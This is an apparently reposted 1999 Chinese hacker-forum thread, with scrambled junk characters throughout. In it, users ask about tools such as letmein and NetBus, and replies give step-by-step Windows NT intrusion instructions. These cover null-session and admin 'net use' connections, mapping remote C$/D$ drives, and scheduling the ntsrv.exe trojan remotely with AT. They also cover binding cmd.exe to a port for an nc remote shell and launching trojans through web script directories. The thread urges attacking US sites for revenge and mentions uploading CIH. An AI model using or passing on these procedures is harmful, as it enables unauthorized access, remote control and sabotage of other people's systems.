《版主頁黑客工具和文章的幾個問題》中提到:, n0 h% A: I- g& a# z) L
請教���,從版主頁上載得PINGER,GRINDER�,LETMEIN等,卻不能用�����,PINGER安裝后�����,明明安裝前文件有1M多�����,但安裝完后生成的文件夾中只有PINGER。EXE���,40多K�,運行PINGER��,設(shè)置好IP�,點PING,彈出一個窗口(C++�����。���。�。)�����,說出錯�����,然后關(guān)閉了,何故��,是不是安裝有誤���? 2��。運行LETMEIN��,彈出以下錯誤:連接文件LETMEIN�。EXE到不存在的NETAPI32��。DLL����;NETGROUPGETUSERS��。 是否說明需要NETAPI32��。DLL文件����,哪里有該DLL。 3��。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運行以下步驟等�,是否要求我的操作系統(tǒng)也是WINNT4。0 ����,應(yīng)該不是吧? 4����。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT��? 太多的問題需高手回答��,我花那么多的時間和金錢下載這幾M文件卻不能用����,實在窩囊哦, 強烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章�,以提高我國黑客水平。5 T6 x7 u1 l+ f. X
> 我的機(jī)子MMX166����,WIN98,2��。5G,32M內(nèi)存�����。' @; J3 A' D& f2 I! k
4 p# k* o% ?! b% m1 A$ U6 V6 Q
黑客并不神秘�����,你只要了解操作系統(tǒng)���,學(xué)習(xí)一些操作系統(tǒng)的弱點���,輔助相關(guān)的工具,就可以成功���。. ^! q# g7 k4 {6 _7 x4 {
你的問題是,pinger, grinder, letmein等工具必須要在NT上運行���,我們強烈建議�����,你一定要安裝NT����,對于你的機(jī)器配制,和我們現(xiàn)在差不多���,只是比你多了32M內(nèi)存�,2G硬盤��。
8 _. p! u! M5 ~) V其實�����,攻擊敵站��,利用其操作系統(tǒng)本身的工具就可以了��,比如�,我們在NT上攻擊某服務(wù)器,該服務(wù)器為NT4.0��,我們將做如下簡單事情就有可能成功�����,假設(shè)目標(biāo)NT的IP地址為111.111.111.111����,做法如下:' N& E6 n9 y- F
net use \\111.111.111.111\ipc$ "" /user:""
; P9 \. n9 g& A V- A: s8 ?7 Onet.exe是NT的工具文件����,該命令將和目標(biāo)服務(wù)器建立Null Session�,如果成功,你可以查看該服務(wù)器上的共享目錄:7 [4 ^; A5 b) F5 B3 ^
net view \\111.111.111.1111 g5 u. q% h0 |+ N- v8 `" e
當(dāng)然�,如果你有該NT管理員密碼,就更好辦了��,假設(shè)其管理員Admin密碼為fuck:% a9 a) g& Q+ u; n; [7 X% I) R
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"% ]; \ J' r5 J3 v0 F4 E, R
命令成功后����,幾乎所有目標(biāo)NT上的配制,資源��,你都可以在你本地NT上連接遠(yuǎn)程計算機(jī)來查看或修改:
, _( B& c8 h; |9 m- R1�����、查看或修改遠(yuǎn)程機(jī)器上的硬盤��,假如目標(biāo)NT上有C����、D兩個硬盤:6 S3 s* _# \& o" Q8 H8 ~; Z. F
net use x: \\111.111.111.111\c$4 i, y+ j1 h( h) |8 M( H. D$ }
net use y: \\111.111.111.111\d$' E$ ^- S" s+ w# W( m
這樣,目標(biāo)NT上的C�、D盤分別被影射為你本地的X、Y盤����,你想怎么做都可以...
/ q6 X2 x6 T# Z& @6 k b& D+ O) F9 [2、管理目標(biāo)NT的用戶:( G' c4 ~- G8 z7 L% ^* q
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”9 J6 }4 t c$ `' [
鍵入\\111.111.111.111后��,目標(biāo)NT上的所有用戶你想怎么做都可以���,和管理你本地的一樣
) v/ @ j, ?: K7 I$ C% j3�、管理目標(biāo)NT的服務(wù)( Q x* E( k& u) P
選擇“管理工具(公用)”->“服務(wù)器管理”->“計算機(jī)”->“選擇域”: J$ o& r+ J( d
這樣你可以管理目標(biāo)NT上的服務(wù)����,共享目錄
- O- I0 n: n% X4 m; p" ?4、IIS管理
, ^/ g, g8 i7 N7 ^' Q6 n. P: I/ _0 R選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
, A _% r5 E0 s% P6 [目標(biāo)NT的FTP���、WWW服務(wù)你就可以重新配置
% m7 Q k3 P# [: E; Y' _+ f; C5�、事件管理( R% a8 Z# J: i3 A
“事件查看器”->連接到服務(wù)器->111.111.111.111+ I5 e7 p8 h# T/ M+ Z- G5 [" ?( j
# V) r; @5 Q) W還有更多的東西�,都可以用NT本身的功能來完成,這些都是95, 98所不能實現(xiàn)的��。# A9 Y% W& X" g
' q3 L, d1 I! i! C$ t3 k; F
當(dāng)然�,98,95也能做一些事情�,但很麻煩��,比如:
& D* v8 w; B/ R" C0 gnet use \\111.111.111.111\ipc$
& F3 t% Y w9 X, U) znet use z: \\111.111.111.111\d$
. J9 {0 | b0 f+ Z# |但其后不能帶參數(shù)��,即改用其他用戶或密碼�,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼��,重新啟動95, 98�,改用該用戶和密碼登錄,方可實現(xiàn)���,你可以連接目標(biāo)NT上的共享資源�,但不能進(jìn)行管理���,如用戶�����、事件等) E& t) |) q. y0 E0 B; a2 `
$ X! Z4 ?8 e- H2 ^, u我們強烈建議各位有心要為死難者報仇�,真正的想黑霉國的站點����,花點時間,裝個NT吧���,NT Workstation也可以��!, u! E' U/ H1 A; ^+ n) m/ V B& c! l
這樣��,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用��!0 u5 f/ ~2 i @9 {7 X- Z! N" E
2 Z' V5 t* g1 W( g7 a6 v/ v/ z
7 ^% [( o `% o; E0 H--------------------------------------------------------------------------------" ?) d/ I$ E5 e9 R; x/ O! }2 L2 ^
( Y' C) }2 E3 C5 D: \+ V- z>quack于1999-06-12�,23:37:44, w# \, x, z) h: S4 `+ J# x" S2 m
在大作《幾個有關(guān)黑的問題》中提到:8 |$ E) m4 M& ~
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運行程序時卻是在我的機(jī)上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!�。
( i o1 n; m M% w; @* I4 c% I
% c/ k( a, a8 y# Rkillusa于1999-06-13,03:25:15
5 |3 G2 T" z; S5 F$ u) X3 g2 v. R/ V在大作《Re: 幾個有關(guān)黑的問題》中提到:# z# M- j& d) a& f, L8 t- N
; g) Q) U1 n' [4 Q3 I% Cletmein.exe 暫時沒有mypwd參數(shù)�����,十分抱歉
, U, b; N: D8 K: m/ ` R% vpinger程序����,只是利用ping來尋找主機(jī),每臺NT服務(wù)器有一個主IP地址����,但也可以設(shè)置多個輔助IP地址,比如有些服務(wù)器供應(yīng)商��,一臺NT服務(wù)器上可以設(shè)置一千多個IP,每個IP對應(yīng)一個Hostname,而真正能找到主機(jī)名的只有一個IP地址�����,就是該主機(jī)的主IP地址���,所以有時顯示只有IP�����,而無主機(jī)名��。另外�,有些服務(wù)器是非NT的操作系統(tǒng)��,有時將不會顯示主機(jī)名���。當(dāng)然����,有時在服務(wù)器上進(jìn)行一些設(shè)置�,也會出現(xiàn)上面的情況。
@5 s, u. B1 Q! ~4 t; v: R. m( d: F! W/ q
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序,所以���,netbus.exe是不用上傳的,只需在目的
- }2 W0 S4 q' _9 i2 S1 t服務(wù)器上運行ntsrv.exe�,而在目的服務(wù)器運行該程序有很多種方法: u |7 x% h' y) C# x6 U( D0 K' m' i6 U
6 r4 Y& \. h& ~1、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運行某程序�,具體使用方法,可在自己的NT Dos窗口下鍵入以下:, ]+ V3 {( w; V9 I
; o7 C) w5 V# f/ DC:\>net start schedule
' {3 A% D7 n! m K- g/ r3 \Schedule 正在啟動服務(wù).....
$ ~2 |4 Y3 Q1 D0 h7 xSchedulw 服務(wù)啟動成功�。0 H4 k! P @0 W9 ~/ M
C:\>at /?
0 d6 I6 {: Z# N/ n/ kAT 命令排定在特定的日期和時間運行某些命令和程序。
9 V5 \' J5 A, ?# i! s8 L H( J運行 AT 命令之前必須先啟動 Schedule 服務(wù)����。4 @7 ]! b5 z+ A+ F/ i+ \$ j* J
. P0 O7 v, k5 g. P- DAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]* d- u$ `- B! o
AT [\\computername] time [/INTERACTIVE]
& A( l* Y) n- n1 T[ /EVERY:date[,...] | /NEXT:date[,...]] "command"3 ?8 Y$ U f& k) C
1 I# X" m3 i8 @3 s8 u6 L3 T& o\\computername 指定遠(yuǎn)程計算機(jī)。 如果省略這個參數(shù)4 r, Z. r) z0 M1 [" T1 m* z; `& p
命令會被排定在本機(jī)上運行���。
. l0 m; \" S# [( X+ Iid 指定給排定進(jìn)度命令的識別號�。
% z& S4 p6 `% ^2 R% v6 b5 A& C
' v- i. ?5 k: X1 U( c/delete 刪除某個已排定進(jìn)度的命令���。如果省略標(biāo)識����,計算機(jī)上所有已排定進(jìn)度的命令都會被刪除���。
0 [! @, J! R; l; k; ?( F" \/yes 用于刪除所有作業(yè)���,且不想在運行刪除時顯示確認(rèn)信息 ���。
; w3 _4 e; _' {- Htime 指定命令運行的時間。
1 H+ ^" r. A7 F$ Z) [/interactive 允許作業(yè)在運行時����,與用戶通過桌面交互。
, T' H* ]/ ?( M# @+ _, ?# ~! s$ c/ A; o0 c8 V; S7 c% U5 S5 T* y) c
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令����。- A4 l' x/ }. [* F; V0 Y
如果省略日期,則默認(rèn)為在每月的本日運行��。
3 \* U' b2 S3 `
0 i1 S3 s* [2 w% I- A! u0 _8 Q9 J9 W/next:date[,...] 指定在下一個指定日期 (如�����,下周三)���,運行命令��。如果省略日期�,則默認(rèn)為在每月的本日運行。* S8 T" Z0 ~; h* X% ~3 P% _
: y2 @" `- y: G1 n/ I"command" 準(zhǔn)備運行的 Windows NT 命令或批處理文件���。/ n+ u( O* F% L
8 u$ i( n6 M \( r% t3 c
C:\>! ? F6 \/ ?- y: v
$ W: n8 `9 b3 ~; e知道了如何使用AT�,再來看看如何在遠(yuǎn)程NT上運行ntsrv.exe:
' o$ ^0 [% {+ h& t1 利用管理員登陸到目的服務(wù)器��,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"0 g7 W- J2 e) e7 |& [& g( v
2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start6 Q1 a# }# r* y& t+ _2 U
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運行�����,當(dāng)然最快運行最理想��,所以�����,你可以用letmein.exe得到服務(wù)器的時間���,然后:
Q5 T ?# F9 G5 kat \\x.x.x.x 00:00 ntsrv.exe /port:64321, A5 C0 v+ D9 _7 G- X
其中00:00要改為用letmein.exe得回來的具體時間+一點容量,等一會后�,再在本地啟動netbus.exe,鍵入目的服務(wù)器得ip地址或hostname����,連接!具體使用可參照 "How to get in nt",比如第一種方法��,你想要在目的服務(wù)器運行 LEGION�����,可以利用netbus得上傳功能��,將LEGION上傳至目的服務(wù)器��,再用netbus的"Start program"�����,鍵入完整路徑的LEGION運行程序��,就ok了��!第二種方法是利用netbus的“App redirect”功能��,啟動遠(yuǎn)程telnet服務(wù)�,如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe"�����,Port為:4321,服務(wù)就啟動了��,然后在本地運行:nc x.x.x.x 4321�����,出現(xiàn)dos啟動的畫面就表示連接成功:
P S! o& ]( d6 W8 bMicrosoft(R) Windows NT(TM)
8 n; Z2 c! o/ n' X" d, B! S(C) Copyright 1985-1996 Microsoft Corp.
- D# e# ?( U6 {7 qC:\>, t0 [% b0 m- k/ c) P: R
+ Q8 N& |. e/ {6 f1 e+ r; W& H2��、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器3 Y" @3 w+ L5 Q0 o
5 q8 B! w/ F* n
將ntsrv.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄���,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
4 l( |8 q5 K2 W2 q! Fhttp://x.x.x.x/scripts/ntsrv.exe /port:64321
5 I! r* G+ w. W或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321/ x9 u2 q9 b( R
該程序就啟動了/ Z2 S ~$ H% z/ U2 M# }8 W
! D& F6 |8 R9 k# f5 j1 q
我只提這幾中方法�����!
0 s5 C J( x& |, J. a8 H要成功����,必須打好基礎(chǔ)工,對操作系統(tǒng)充分了解!, G; R9 c/ ?/ t/ q- ^6 @6 t
; u8 ~* i* {9 i+ r' x- g
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡